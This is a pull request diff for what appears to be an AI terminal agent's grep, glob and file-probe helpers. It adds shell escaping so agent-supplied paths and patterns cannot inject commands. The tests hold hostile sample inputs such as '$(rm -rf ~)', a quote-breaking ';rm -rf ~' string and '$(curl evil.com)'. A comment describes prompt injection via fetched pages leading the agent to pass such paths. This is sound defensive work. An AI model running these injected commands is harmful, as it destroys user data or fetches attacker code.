### PR TITLE
Shell-quote agent-controlled paths in AI tool helpers

### DIFF
--- a/app/src/ai/blocklist/action_model/execute.rs
+++ b/app/src/ai/blocklist/action_model/execute.rs
@@ -1290,14 +1290,30 @@ async fn read_binary_file_context(
     })
 }
 
+/// Builds the shell command used by [`is_file_path`]. The `path` is escaped
+/// for the target shell family so metacharacters (`$(...)`, backticks,
+/// `$VAR`, `;`, etc.) in a legitimate or attacker-influenced filename do not
+/// get re-interpreted by the shell.
+fn build_is_file_path_command(path: &str, shell_type: ShellType) -> String {
+    let escaped = warp_util::path::ShellFamily::from(shell_type).shell_escape(path);
+    if shell_type == ShellType::PowerShell {
+        format!("if (Test-Path -PathType Leaf {escaped}) {{ exit 0 }} else {{ exit 1 }}")
+    } else {
+        format!("test -f {escaped}")
+    }
+}
+
+/// Builds the shell command used by [`is_git_repository`]. See
+/// [`build_is_file_path_command`] for why escaping is required.
+fn build_is_git_repository_command(absolute_path: &str, shell_type: ShellType) -> String {
+    let escaped = warp_util::path::ShellFamily::from(shell_type).shell_escape(absolute_path);
+    format!("git -C {escaped} rev-parse")
+}
+
 /// Returns true if the given path is a regular file on the session's filesystem.
 /// Runs a shell command on the session so it works for both local and remote sessions.
 async fn is_file_path(path: &str, session: &Session) -> bool {
-    let command = if session.shell().shell_type() == ShellType::PowerShell {
-        format!("if (Test-Path -PathType Leaf \"{path}\") {{ exit 0 }} else {{ exit 1 }}")
-    } else {
-        format!("test -f \"{path}\"")
-    };
+    let command = build_is_file_path_command(path, session.shell().shell_type());
     session
         .execute_command(&command, None, None, ExecuteCommandOptions::default())
         .await
@@ -1307,7 +1323,7 @@ async fn is_file_path(path: &str, session: &Session) -> bool {
 
 /// Returns true if git is installed and the given path is in a git repository.
 async fn is_git_repository(absolute_path: &str, session: &Session) -> anyhow::Result<bool> {
-    let git_command = format!("git -C \"{absolute_path}\" rev-parse");
+    let git_command = build_is_git_repository_command(absolute_path, session.shell().shell_type());
     let command_output = session
         .execute_command(
             git_command.as_str(),

--- a/app/src/ai/blocklist/action_model/execute.rs
+++ b/app/src/ai/blocklist/action_model/execute.rs
@@ -71,6 +71,7 @@ use warp_files::{FileModel, TextFileReadResult};
 use warp_util::file::FileLoadError;
 #[cfg(feature = "local_fs")]
 use warp_util::file_type::is_buffer_binary;
+use warp_util::path::ShellFamily;
 use warpui::{
     r#async::{Spawnable, SpawnableOutput},
     AppContext, Entity, EntityId, ModelContext, ModelHandle, SingletonEntity,
@@ -1295,7 +1296,7 @@ async fn read_binary_file_context(
 /// `$VAR`, `;`, etc.) in a legitimate or attacker-influenced filename do not
 /// get re-interpreted by the shell.
 fn build_is_file_path_command(path: &str, shell_type: ShellType) -> String {
-    let escaped = warp_util::path::ShellFamily::from(shell_type).shell_escape(path);
+    let escaped = ShellFamily::from(shell_type).shell_escape(path);
     if shell_type == ShellType::PowerShell {
         format!("if (Test-Path -PathType Leaf {escaped}) {{ exit 0 }} else {{ exit 1 }}")
     } else {
@@ -1306,7 +1307,7 @@ fn build_is_file_path_command(path: &str, shell_type: ShellType) -> String {
 /// Builds the shell command used by [`is_git_repository`]. See
 /// [`build_is_file_path_command`] for why escaping is required.
 fn build_is_git_repository_command(absolute_path: &str, shell_type: ShellType) -> String {
-    let escaped = warp_util::path::ShellFamily::from(shell_type).shell_escape(absolute_path);
+    let escaped = ShellFamily::from(shell_type).shell_escape(absolute_path);
     format!("git -C {escaped} rev-parse")
 }
 

--- a/app/src/ai/blocklist/action_model/execute/file_glob.rs
+++ b/app/src/ai/blocklist/action_model/execute/file_glob.rs
@@ -33,6 +33,66 @@ use super::{
     ExecuteActionInput, PreprocessActionInput,
 };
 
+/// Builds the `git ls-files` command emitted by [`run_git_ls_files_command`].
+/// Both `target_path` and `patterns` are agent-controlled; without shell
+/// escaping a pattern containing `'` could close the surrounding single-quote
+/// pair and append a second command. Each joined path is escaped with
+/// `ShellFamily::Posix::escape` (no tilde preservation, since these are
+/// pathspecs rather than user paths).
+pub(crate) fn build_git_ls_files_command(
+    patterns: &[String],
+    target_path: &str,
+    shell_launch_data: Option<&ShellLaunchData>,
+) -> String {
+    let shell_family = warp_util::path::ShellFamily::Posix;
+    let pattern_args = patterns
+        .iter()
+        .flat_map(|pattern| {
+            [
+                // Matches on files in the target path.
+                join_paths(&[target_path, pattern], shell_launch_data),
+                // Matches on files in any subdirectory of the target path.
+                join_paths(&[target_path, "*", pattern], shell_launch_data),
+            ]
+        })
+        .map(|joined| shell_family.escape(&joined).into_owned())
+        .join(" ");
+    format!("git ls-files -c -o --exclude-standard -- {pattern_args}")
+}
+
+/// Builds the `find` command emitted by [`run_find_command`]. See
+/// [`build_git_ls_files_command`] for the threat model.
+pub(crate) fn build_find_command(patterns: &[String], target_path: &str) -> String {
+    let shell_family = warp_util::path::ShellFamily::Posix;
+    // Build a find command with -name for each pattern. Each pattern is
+    // shell-escaped to neutralise embedded `'`, `$(...)`, backticks, etc.
+    let pattern_args = patterns
+        .iter()
+        .map(|pattern| format!(" -name {}", shell_family.escape(pattern)))
+        .join(" -o");
+    let escaped_target = shell_family.shell_escape(target_path);
+    format!("find {escaped_target} -type f {pattern_args}")
+}
+
+/// Builds the PowerShell `Get-ChildItem` command emitted by
+/// [`run_powershell_get_childitem_command`]. See
+/// [`build_git_ls_files_command`] for the threat model.
+pub(crate) fn build_powershell_get_childitem_command(
+    patterns: &[String],
+    target_path: &str,
+) -> String {
+    let shell_family = warp_util::path::ShellFamily::PowerShell;
+    let pattern_args = patterns
+        .iter()
+        .map(|pattern| shell_family.escape(pattern))
+        .collect::<Vec<_>>()
+        .join(",");
+    let escaped_target = shell_family.shell_escape(target_path);
+    format!(
+        "Get-ChildItem -File -Recurse -Include {pattern_args} -Path {escaped_target} | ForEach-Object {{ $_.FullName }}"
+    )
+}
+
 pub struct FileGlobExecutor {
     active_session: ModelHandle<ActiveSession>,
     terminal_view_id: EntityId,
@@ -239,19 +299,7 @@ async fn run_git_ls_files_command(
     session: &Session,
     shell_launch_data: Option<ShellLaunchData>,
 ) -> anyhow::Result<FileGlobV2Result> {
-    let pattern_args = patterns
-        .iter()
-        .flat_map(|pattern| {
-            [
-                // Matches on files in the target path.
-                join_paths(&[target_path, pattern], shell_launch_data.as_ref()),
-                // Matches on files in any subdirectory of the target path.
-                join_paths(&[target_path, "*", pattern], shell_launch_data.as_ref()),
-            ]
-        })
-        .map(|pattern| format!("'{pattern}'"))
-        .join(" ");
-    let command = format!("git ls-files -c -o --exclude-standard -- {pattern_args}");
+    let command = build_git_ls_files_command(patterns, target_path, shell_launch_data.as_ref());
 
     let command_output = session
         .execute_command(
@@ -287,16 +335,7 @@ async fn run_find_command(
     target_path: &str,
     session: &Session,
 ) -> anyhow::Result<FileGlobV2Result> {
-    // Build a find command with -name for each pattern
-    let pattern_args = patterns
-        .iter()
-        .map(|pattern| format!(" -name '{pattern}'"))
-        .join(" -o");
-    // `target_path` flows verbatim into a shell command, so escape it for the
-    // POSIX shell. Without this, a path containing `$(...)`, backticks, or
-    // other metacharacters would be re-interpreted by the shell.
-    let escaped_target = warp_util::path::ShellFamily::Posix.shell_escape(target_path);
-    let find_command = format!("find {escaped_target} -type f {pattern_args}");
+    let find_command = build_find_command(patterns, target_path);
 
     let command_output = session
         .execute_command(
@@ -335,14 +374,7 @@ async fn run_powershell_get_childitem_command(
     target_path: &str,
     session: &Session,
 ) -> anyhow::Result<FileGlobV2Result> {
-    let pattern_args = patterns
-        .iter()
-        .map(|pattern| format!("'{pattern}'"))
-        .join(",");
-    let escaped_target = warp_util::path::ShellFamily::PowerShell.shell_escape(target_path);
-    let command = format!(
-        "Get-ChildItem -File -Recurse -Include {pattern_args} -Path {escaped_target} | ForEach-Object {{ $_.FullName }}"
-    );
+    let command = build_powershell_get_childitem_command(patterns, target_path);
 
     let command_output = session
         .execute_command(

--- a/app/src/ai/blocklist/action_model/execute/file_glob.rs
+++ b/app/src/ai/blocklist/action_model/execute/file_glob.rs
@@ -37,14 +37,16 @@ use super::{
 /// Both `target_path` and `patterns` are agent-controlled; without shell
 /// escaping a pattern containing `'` could close the surrounding single-quote
 /// pair and append a second command. Each joined path is escaped with
-/// `ShellFamily::Posix::escape` (no tilde preservation, since these are
-/// pathspecs rather than user paths).
+/// `ShellFamily::escape` (no tilde preservation, since these are pathspecs
+/// rather than user paths) for the session's shell family — `git ls-files`
+/// runs under PowerShell too, so we cannot hard-code POSIX backslash escapes.
 pub(crate) fn build_git_ls_files_command(
     patterns: &[String],
     target_path: &str,
     shell_launch_data: Option<&ShellLaunchData>,
+    shell_type: ShellType,
 ) -> String {
-    let shell_family = warp_util::path::ShellFamily::Posix;
+    let shell_family = warp_util::path::ShellFamily::from(shell_type);
     let pattern_args = patterns
         .iter()
         .flat_map(|pattern| {
@@ -283,6 +285,7 @@ async fn run_file_glob(
             &absolute_path,
             session.as_ref(),
             shell_launch_data,
+            session.shell().shell_type(),
         )
         .await
     } else if session.shell().shell_type() == ShellType::PowerShell {
@@ -298,8 +301,10 @@ async fn run_git_ls_files_command(
     target_path: &str,
     session: &Session,
     shell_launch_data: Option<ShellLaunchData>,
+    shell_type: ShellType,
 ) -> anyhow::Result<FileGlobV2Result> {
-    let command = build_git_ls_files_command(patterns, target_path, shell_launch_data.as_ref());
+    let command =
+        build_git_ls_files_command(patterns, target_path, shell_launch_data.as_ref(), shell_type);
 
     let command_output = session
         .execute_command(

--- a/app/src/ai/blocklist/action_model/execute/file_glob.rs
+++ b/app/src/ai/blocklist/action_model/execute/file_glob.rs
@@ -292,7 +292,11 @@ async fn run_find_command(
         .iter()
         .map(|pattern| format!(" -name '{pattern}'"))
         .join(" -o");
-    let find_command = format!("find \"{target_path}\" -type f {pattern_args}");
+    // `target_path` flows verbatim into a shell command, so escape it for the
+    // POSIX shell. Without this, a path containing `$(...)`, backticks, or
+    // other metacharacters would be re-interpreted by the shell.
+    let escaped_target = warp_util::path::ShellFamily::Posix.shell_escape(target_path);
+    let find_command = format!("find {escaped_target} -type f {pattern_args}");
 
     let command_output = session
         .execute_command(
@@ -335,8 +339,9 @@ async fn run_powershell_get_childitem_command(
         .iter()
         .map(|pattern| format!("'{pattern}'"))
         .join(",");
+    let escaped_target = warp_util::path::ShellFamily::PowerShell.shell_escape(target_path);
     let command = format!(
-        "Get-ChildItem -File -Recurse -Include {pattern_args} -Path \"{target_path}\" | ForEach-Object {{ $_.FullName }}"
+        "Get-ChildItem -File -Recurse -Include {pattern_args} -Path {escaped_target} | ForEach-Object {{ $_.FullName }}"
     );
 
     let command_output = session

--- a/app/src/ai/blocklist/action_model/execute/file_glob.rs
+++ b/app/src/ai/blocklist/action_model/execute/file_glob.rs
@@ -5,6 +5,7 @@ use std::time::Duration;
 use futures::future::BoxFuture;
 use futures::FutureExt;
 use itertools::Itertools;
+use warp_util::path::ShellFamily;
 use warpui::r#async::FutureExt as AsyncFutureExt;
 use warpui::{AppContext, Entity, EntityId, ModelContext, ModelHandle, SingletonEntity};
 
@@ -46,7 +47,7 @@ pub(crate) fn build_git_ls_files_command(
     shell_launch_data: Option<&ShellLaunchData>,
     shell_type: ShellType,
 ) -> String {
-    let shell_family = warp_util::path::ShellFamily::from(shell_type);
+    let shell_family = ShellFamily::from(shell_type);
     let pattern_args = patterns
         .iter()
         .flat_map(|pattern| {
@@ -65,7 +66,7 @@ pub(crate) fn build_git_ls_files_command(
 /// Builds the `find` command emitted by [`run_find_command`]. See
 /// [`build_git_ls_files_command`] for the threat model.
 pub(crate) fn build_find_command(patterns: &[String], target_path: &str) -> String {
-    let shell_family = warp_util::path::ShellFamily::Posix;
+    let shell_family = ShellFamily::Posix;
     // Build a find command with -name for each pattern. Each pattern is
     // shell-escaped to neutralise embedded `'`, `$(...)`, backticks, etc.
     let pattern_args = patterns
@@ -83,7 +84,7 @@ pub(crate) fn build_powershell_get_childitem_command(
     patterns: &[String],
     target_path: &str,
 ) -> String {
-    let shell_family = warp_util::path::ShellFamily::PowerShell;
+    let shell_family = ShellFamily::PowerShell;
     let pattern_args = patterns
         .iter()
         .map(|pattern| shell_family.escape(pattern))

--- a/app/src/ai/blocklist/action_model/execute/grep.rs
+++ b/app/src/ai/blocklist/action_model/execute/grep.rs
@@ -39,12 +39,67 @@ use super::{
 const GREP_TIMEOUT: Duration = Duration::from_secs(10);
 const NON_ZERO_EXIT_CODE_ERROR: &str = "Grep command exited with non-zero exit code";
 
-fn escape_double_quotes(s: &str) -> String {
-    s.replace('"', "\\\"")
+/// Builds the `git grep` command emitted by [`run_git_grep_command`]. Both
+/// `queries` (regex patterns) and `target_path` are agent-controlled; without
+/// shell escaping a query like `$(touch /tmp/PWNED)` or a path containing
+/// `$(...)` / backticks would be re-interpreted by the shell before the
+/// underlying `git grep` ever runs. Queries are escaped with `ShellFamily::escape`
+/// (no tilde preservation) since they are literal regex bodies; the path uses
+/// `shell_escape` so a legitimate `~/...` argument still resolves to `$HOME`.
+pub(crate) fn build_git_grep_command(
+    queries: &[String],
+    target_path: &str,
+    shell_type: ShellType,
+) -> String {
+    let shell_family = warp_util::path::ShellFamily::from(shell_type);
+    // This command works on all the shells we support (even PowerShell).
+    let mut grep_command = "git --no-pager grep --color=never --untracked -nIE".to_string();
+    for query in queries {
+        let escaped_query = shell_family.escape(query);
+        grep_command.push_str(format!(" -e {escaped_query}").as_str());
+    }
+    let escaped_target = shell_family.shell_escape(target_path);
+    grep_command.push_str(format!(" {escaped_target}").as_str());
+    grep_command
 }
 
-fn powershell_escape_double_quotes(s: &str) -> String {
-    s.replace('"', "`\"")
+/// Builds the POSIX `grep` command emitted by [`run_grep_command`]. See
+/// [`build_git_grep_command`] for the threat model.
+pub(crate) fn build_grep_command(queries: &[String], target_path: &str) -> String {
+    let shell_family = warp_util::path::ShellFamily::Posix;
+    // Summary of the options we use:
+    // * "--color=never" ensures we don't get colorized output which is harder to parse due to escape sequences
+    // * "-n" includes line numbers
+    // * "-r" performs a recursive search
+    // * "-I" ignores binary files
+    // * "-H" prints file name headers
+    // * "-E" uses extended regex expressions
+    let mut grep_command = "grep --color=never -nrIHE --devices=skip".to_string();
+    for query in queries {
+        let escaped_query = shell_family.escape(query);
+        grep_command.push_str(format!(" -e {escaped_query}").as_str());
+    }
+    let escaped_target = shell_family.shell_escape(target_path);
+    grep_command.push_str(format!(" {escaped_target}").as_str());
+    grep_command
+}
+
+/// Builds the PowerShell `Select-String` command emitted by
+/// [`run_select_string_command`]. See [`build_git_grep_command`] for the
+/// threat model.
+pub(crate) fn build_select_string_command(queries: &[String], target_path: &str) -> String {
+    let shell_family = warp_util::path::ShellFamily::PowerShell;
+    let escaped_target = shell_family.shell_escape(target_path);
+    let escaped_patterns = queries
+        .iter()
+        .map(|q| shell_family.escape(q))
+        .collect::<Vec<_>>()
+        .join(",");
+    // We enable the `-CaseSensitive` flag to match the default behavior of grep.
+    // TODO(CODE-239): Make this command more efficient when searching a file.
+    format!(
+        "Get-ChildItem -Path {escaped_target} -Recurse -File | Select-String -NoEmphasis -CaseSensitive -Pattern {escaped_patterns}"
+    )
 }
 
 /// Information about the Grep call that resulted in an error, used to send
@@ -472,24 +527,7 @@ async fn run_git_grep_command(
     shell_type: ShellType,
     execute_directory: &str,
 ) -> Result<GrepResult, GrepError> {
-    // This command works on all the shells we support (even PowerShell).
-    let mut grep_command = "git --no-pager grep --color=never --untracked -nIE".to_string();
-    for query in queries {
-        let escaped_query = format!(
-            "\"{}\"",
-            if shell_type == ShellType::PowerShell {
-                powershell_escape_double_quotes(query)
-            } else {
-                escape_double_quotes(query)
-            }
-        );
-        grep_command.push_str(format!(" -e {escaped_query}").as_str());
-    }
-    // `target_path` flows verbatim into a shell command. Without escaping, a
-    // path containing `$(...)`, backticks, or other metacharacters would be
-    // re-interpreted by the shell. See `shell_escape` for details.
-    let escaped_target = warp_util::path::ShellFamily::from(shell_type).shell_escape(target_path);
-    grep_command.push_str(format!(" {escaped_target}").as_str());
+    let grep_command = build_git_grep_command(queries, target_path, shell_type);
 
     let command_output = session
         .execute_command(
@@ -537,19 +575,7 @@ async fn run_grep_command(
     shell_launch_data: Option<ShellLaunchData>,
     execute_directory: &str,
 ) -> Result<GrepResult, GrepError> {
-    // Summary of the options we use:
-    // * "--color=never" ensures we don't get colorized output which is harder to parse due to escape sequences
-    // * "-n" includes line numbers
-    // * "-r" performs a recursive search
-    // * "-I" ignores binary files
-    // * "-H" prints file name headers
-    // * "-E" uses extended regex expressions
-    let mut grep_command = "grep --color=never -nrIHE --devices=skip".to_string();
-    for query in queries {
-        grep_command.push_str(format!(" -e \"{}\"", escape_double_quotes(query)).as_str());
-    }
-    let escaped_target = warp_util::path::ShellFamily::Posix.shell_escape(target_path);
-    grep_command.push_str(format!(" {escaped_target}").as_str());
+    let grep_command = build_grep_command(queries, target_path);
 
     let command_output = session
         .execute_command(
@@ -598,17 +624,7 @@ async fn run_select_string_command(
     shell_launch_data: Option<ShellLaunchData>,
     execute_directory: &str,
 ) -> Result<GrepResult, GrepError> {
-    // We enable the `-CaseSensitive` flag to match the default behavior of grep.
-    // TODO(CODE-239): Make this command more efficient when searching a file.
-    let escaped_target = warp_util::path::ShellFamily::PowerShell.shell_escape(target_path);
-    let select_string_command = format!(
-        "Get-ChildItem -Path {escaped_target} -Recurse -File | Select-String -NoEmphasis -CaseSensitive -Pattern {}",
-        queries
-            .iter()
-            .map(|q| format!("\"{}\"", powershell_escape_double_quotes(q)))
-            .collect::<Vec<_>>()
-            .join(",")
-    );
+    let select_string_command = build_select_string_command(queries, target_path);
 
     let command_output = session
         .execute_command(

--- a/app/src/ai/blocklist/action_model/execute/grep.rs
+++ b/app/src/ai/blocklist/action_model/execute/grep.rs
@@ -485,7 +485,11 @@ async fn run_git_grep_command(
         );
         grep_command.push_str(format!(" -e {escaped_query}").as_str());
     }
-    grep_command.push_str(format!(" \"{target_path}\"").as_str());
+    // `target_path` flows verbatim into a shell command. Without escaping, a
+    // path containing `$(...)`, backticks, or other metacharacters would be
+    // re-interpreted by the shell. See `shell_escape` for details.
+    let escaped_target = warp_util::path::ShellFamily::from(shell_type).shell_escape(target_path);
+    grep_command.push_str(format!(" {escaped_target}").as_str());
 
     let command_output = session
         .execute_command(
@@ -544,7 +548,8 @@ async fn run_grep_command(
     for query in queries {
         grep_command.push_str(format!(" -e \"{}\"", escape_double_quotes(query)).as_str());
     }
-    grep_command.push_str(format!(" \"{target_path}\"").as_str());
+    let escaped_target = warp_util::path::ShellFamily::Posix.shell_escape(target_path);
+    grep_command.push_str(format!(" {escaped_target}").as_str());
 
     let command_output = session
         .execute_command(
@@ -595,9 +600,9 @@ async fn run_select_string_command(
 ) -> Result<GrepResult, GrepError> {
     // We enable the `-CaseSensitive` flag to match the default behavior of grep.
     // TODO(CODE-239): Make this command more efficient when searching a file.
+    let escaped_target = warp_util::path::ShellFamily::PowerShell.shell_escape(target_path);
     let select_string_command = format!(
-        "Get-ChildItem -Path \"{}\" -Recurse -File | Select-String -NoEmphasis -CaseSensitive -Pattern {}",
-        target_path,
+        "Get-ChildItem -Path {escaped_target} -Recurse -File | Select-String -NoEmphasis -CaseSensitive -Pattern {}",
         queries
             .iter()
             .map(|q| format!("\"{}\"", powershell_escape_double_quotes(q)))

--- a/app/src/ai/blocklist/action_model/execute/grep.rs
+++ b/app/src/ai/blocklist/action_model/execute/grep.rs
@@ -4,6 +4,7 @@ use std::path::PathBuf;
 use std::sync::Arc;
 use std::time::Duration;
 
+use warp_util::path::ShellFamily;
 use warp_util::standardized_path::StandardizedPath;
 
 use futures::future::BoxFuture;
@@ -51,7 +52,7 @@ pub(crate) fn build_git_grep_command(
     target_path: &str,
     shell_type: ShellType,
 ) -> String {
-    let shell_family = warp_util::path::ShellFamily::from(shell_type);
+    let shell_family = ShellFamily::from(shell_type);
     // This command works on all the shells we support (even PowerShell).
     let mut grep_command = "git --no-pager grep --color=never --untracked -nIE".to_string();
     for query in queries {
@@ -66,7 +67,7 @@ pub(crate) fn build_git_grep_command(
 /// Builds the POSIX `grep` command emitted by [`run_grep_command`]. See
 /// [`build_git_grep_command`] for the threat model.
 pub(crate) fn build_grep_command(queries: &[String], target_path: &str) -> String {
-    let shell_family = warp_util::path::ShellFamily::Posix;
+    let shell_family = ShellFamily::Posix;
     // Summary of the options we use:
     // * "--color=never" ensures we don't get colorized output which is harder to parse due to escape sequences
     // * "-n" includes line numbers
@@ -88,7 +89,7 @@ pub(crate) fn build_grep_command(queries: &[String], target_path: &str) -> Strin
 /// [`run_select_string_command`]. See [`build_git_grep_command`] for the
 /// threat model.
 pub(crate) fn build_select_string_command(queries: &[String], target_path: &str) -> String {
-    let shell_family = warp_util::path::ShellFamily::PowerShell;
+    let shell_family = ShellFamily::PowerShell;
     let escaped_target = shell_family.shell_escape(target_path);
     let escaped_patterns = queries
         .iter()

--- a/app/src/ai/blocklist/action_model/execute_tests.rs
+++ b/app/src/ai/blocklist/action_model/execute_tests.rs
@@ -367,6 +367,7 @@ mod file_glob_shell_quoting {
     use super::super::file_glob::{
         build_find_command, build_git_ls_files_command, build_powershell_get_childitem_command,
     };
+    use crate::terminal::shell::ShellType;
 
     #[test]
     fn find_plain_posix() {
@@ -404,11 +405,12 @@ mod file_glob_shell_quoting {
     }
 
     #[test]
-    fn git_ls_files_neutralises_pattern_embedded_single_quote() {
+    fn git_ls_files_neutralises_pattern_embedded_single_quote_posix() {
         let cmd = build_git_ls_files_command(
             &["foo';rm -rf ~;echo '".to_string()],
             "/repo",
             None,
+            ShellType::Bash,
         );
         assert!(
             !cmd.contains("';rm") && !cmd.contains("rf ~"),
@@ -417,13 +419,41 @@ mod file_glob_shell_quoting {
     }
 
     #[test]
-    fn git_ls_files_neutralises_pattern_substitution() {
+    fn git_ls_files_neutralises_pattern_substitution_posix() {
         let cmd = build_git_ls_files_command(
             &["$(touch ~/PWNED)".to_string()],
             "/repo",
             None,
+            ShellType::Bash,
         );
         assert!(!cmd.contains("$(touch"), "got: {cmd}");
+    }
+
+    #[test]
+    fn git_ls_files_neutralises_pattern_substitution_powershell() {
+        // `git ls-files` runs under PowerShell sessions too — the previous
+        // hard-coded POSIX escaping left `$(...)` reachable there.
+        let cmd = build_git_ls_files_command(
+            &["$(rm -rf ~)".to_string()],
+            "C:\\repo",
+            None,
+            ShellType::PowerShell,
+        );
+        assert!(!cmd.contains("$(rm"), "got: {cmd}");
+    }
+
+    #[test]
+    fn git_ls_files_neutralises_pattern_embedded_single_quote_powershell() {
+        let cmd = build_git_ls_files_command(
+            &["foo';rm -rf ~;echo '".to_string()],
+            "C:\\repo",
+            None,
+            ShellType::PowerShell,
+        );
+        assert!(
+            !cmd.contains("';rm") && !cmd.contains("rf ~"),
+            "got: {cmd}",
+        );
     }
 
     #[test]

--- a/app/src/ai/blocklist/action_model/execute_tests.rs
+++ b/app/src/ai/blocklist/action_model/execute_tests.rs
@@ -97,3 +97,152 @@ mod binary_detection {
         assert!(block_on(is_file_content_binary_async(&missing)));
     }
 }
+
+mod path_shell_quoting {
+    //! These probes (`is_file_path`, `is_git_repository`) are called as
+    //! side-effects of other agent tool calls (`grep`, `glob`) and run on the
+    //! user's shell WITHOUT a separate per-command approval gate. A path
+    //! containing shell metacharacters — whether legitimate (a folder named
+    //! `foo (copy)`) or attacker-influenced via prompt injection (a path the
+    //! model copied out of a fetched web page or a file it `read`) — must not
+    //! be re-interpreted by the shell. These tests pin the expected
+    //! byte-for-byte shape of the emitted commands.
+    use super::super::{build_is_file_path_command, build_is_git_repository_command};
+    use crate::terminal::shell::ShellType;
+
+    #[test]
+    fn is_file_path_plain_posix() {
+        assert_eq!(
+            build_is_file_path_command("/tmp/file.txt", ShellType::Bash),
+            "test -f /tmp/file.txt",
+        );
+    }
+
+    #[test]
+    fn is_file_path_with_spaces_posix() {
+        // A path with a space must be a single shell word after escaping.
+        assert_eq!(
+            build_is_file_path_command("/tmp/has space/file", ShellType::Zsh),
+            "test -f /tmp/has\\ space/file",
+        );
+    }
+
+    #[test]
+    fn is_file_path_command_substitution_posix() {
+        // Without escaping the shell would run `touch /tmp/PWNED` before
+        // `test -f`. After escaping, `$(...)` and `(`/`)` are literal.
+        let cmd = build_is_file_path_command("/tmp/x$(touch /tmp/PWNED)y", ShellType::Bash);
+        assert!(
+            !cmd.contains("$(touch"),
+            "command substitution must be neutralized; got: {cmd}",
+        );
+        assert_eq!(cmd, "test -f /tmp/x\\$\\(touch\\ /tmp/PWNED\\)y");
+    }
+
+    #[test]
+    fn is_file_path_backtick_substitution_posix() {
+        let cmd = build_is_file_path_command("/tmp/`id`", ShellType::Bash);
+        assert!(
+            !cmd.contains("`id`"),
+            "backtick substitution must be neutralized; got: {cmd}",
+        );
+    }
+
+    #[test]
+    fn is_file_path_variable_expansion_posix() {
+        // `$HOME` inside the path must not expand to the user's home dir; the
+        // `$` is backslash-escaped so the shell treats it as a literal.
+        assert_eq!(
+            build_is_file_path_command("/tmp/$HOME/x", ShellType::Bash),
+            "test -f /tmp/\\$HOME/x",
+        );
+    }
+
+    #[test]
+    fn is_file_path_semicolon_chain_posix() {
+        // A trailing `;rm -rf ~` must not turn into a second command; the `;`,
+        // spaces, and `~` are all backslash-escaped.
+        assert_eq!(
+            build_is_file_path_command("/tmp/x;rm -rf ~", ShellType::Bash),
+            "test -f /tmp/x\\;rm\\ -rf\\ \\~",
+        );
+    }
+
+    #[test]
+    fn is_file_path_plain_powershell() {
+        assert_eq!(
+            build_is_file_path_command("C:\\Users\\me\\file.txt", ShellType::PowerShell),
+            "if (Test-Path -PathType Leaf C:\\Users\\me\\file.txt) { exit 0 } else { exit 1 }",
+        );
+    }
+
+    #[test]
+    fn is_file_path_command_substitution_powershell() {
+        // PowerShell expands `$(...)` inside `"..."`; with backtick-escaping
+        // applied, the substitution becomes literal text.
+        let cmd =
+            build_is_file_path_command("C:\\tmp\\x$(rm -rf ~)y", ShellType::PowerShell);
+        assert!(
+            !cmd.contains("$(rm"),
+            "PowerShell `$(...)` must be neutralized; got: {cmd}",
+        );
+    }
+
+    #[test]
+    fn is_file_path_variable_expansion_powershell() {
+        // PowerShell would normally interpolate `$env:HOME`-style references
+        // inside `"..."`. Backtick-escaping the `$` makes it literal.
+        assert_eq!(
+            build_is_file_path_command(
+                "C:\\tmp\\$env:USERPROFILE\\x",
+                ShellType::PowerShell,
+            ),
+            "if (Test-Path -PathType Leaf C:\\tmp\\`$env:USERPROFILE\\x) { exit 0 } else { exit 1 }",
+        );
+    }
+
+    #[test]
+    fn is_git_repository_plain_posix() {
+        assert_eq!(
+            build_is_git_repository_command("/tmp/repo", ShellType::Bash),
+            "git -C /tmp/repo rev-parse",
+        );
+    }
+
+    #[test]
+    fn is_git_repository_command_substitution_posix() {
+        let cmd = build_is_git_repository_command("/tmp/x$(curl evil.com)", ShellType::Bash);
+        assert!(
+            !cmd.contains("$(curl"),
+            "command substitution must be neutralized; got: {cmd}",
+        );
+        assert_eq!(cmd, "git -C /tmp/x\\$\\(curl\\ evil.com\\) rev-parse");
+    }
+
+    #[test]
+    fn is_git_repository_plain_powershell() {
+        assert_eq!(
+            build_is_git_repository_command("C:\\repo", ShellType::PowerShell),
+            "git -C C:\\repo rev-parse",
+        );
+    }
+
+    #[test]
+    fn is_git_repository_command_substitution_powershell() {
+        let cmd =
+            build_is_git_repository_command("C:\\x$(rm -rf ~)y", ShellType::PowerShell);
+        assert!(
+            !cmd.contains("$(rm"),
+            "PowerShell `$(...)` must be neutralized; got: {cmd}",
+        );
+    }
+
+    #[test]
+    fn is_file_path_fish_uses_posix_escape() {
+        // Fish is grouped with the POSIX shell family for escaping purposes
+        // (see `From<ShellType> for ShellFamily`).
+        let cmd = build_is_file_path_command("/tmp/x$(id)y", ShellType::Fish);
+        assert!(!cmd.contains("$(id)"));
+        assert!(cmd.starts_with("test -f "));
+    }
+}

--- a/app/src/ai/blocklist/action_model/execute_tests.rs
+++ b/app/src/ai/blocklist/action_model/execute_tests.rs
@@ -246,3 +246,215 @@ mod path_shell_quoting {
         assert!(cmd.starts_with("test -f "));
     }
 }
+
+mod grep_shell_quoting {
+    //! `target_path` *and* `queries` flow from the agent into the shell command
+    //! `git grep` / `grep` / `Select-String` runs against the user's session.
+    //! Without escaping, an agent-supplied query like `$(touch ~/PWNED)` runs
+    //! as a side-effect of the grep tool call — same silent-RCE class as the
+    //! `is_file_path` / `is_git_repository` probes. These tests pin the
+    //! byte-exact shape of the emitted commands.
+    use super::super::grep::{
+        build_git_grep_command, build_grep_command, build_select_string_command,
+    };
+    use crate::terminal::shell::ShellType;
+
+    #[test]
+    fn git_grep_plain_posix() {
+        assert_eq!(
+            build_git_grep_command(
+                &["TODO".to_string(), "fix".to_string()],
+                "/repo",
+                ShellType::Bash,
+            ),
+            "git --no-pager grep --color=never --untracked -nIE -e TODO -e fix /repo",
+        );
+    }
+
+    #[test]
+    fn git_grep_neutralises_query_command_substitution_posix() {
+        // Without escaping, this would run `touch ~/PWNED` before `git grep`.
+        let cmd = build_git_grep_command(
+            &["$(touch ~/PWNED)".to_string()],
+            "/repo",
+            ShellType::Bash,
+        );
+        assert!(!cmd.contains("$(touch"), "got: {cmd}");
+        assert_eq!(
+            cmd,
+            "git --no-pager grep --color=never --untracked -nIE -e \\$\\(touch\\ \\~/PWNED\\) /repo",
+        );
+    }
+
+    #[test]
+    fn git_grep_neutralises_query_backticks_posix() {
+        let cmd = build_git_grep_command(
+            &["`id`".to_string()],
+            "/repo",
+            ShellType::Bash,
+        );
+        assert!(!cmd.contains("`id`"), "got: {cmd}");
+    }
+
+    #[test]
+    fn git_grep_neutralises_target_substitution_posix() {
+        let cmd = build_git_grep_command(
+            &["foo".to_string()],
+            "/tmp/x$(curl evil.com)",
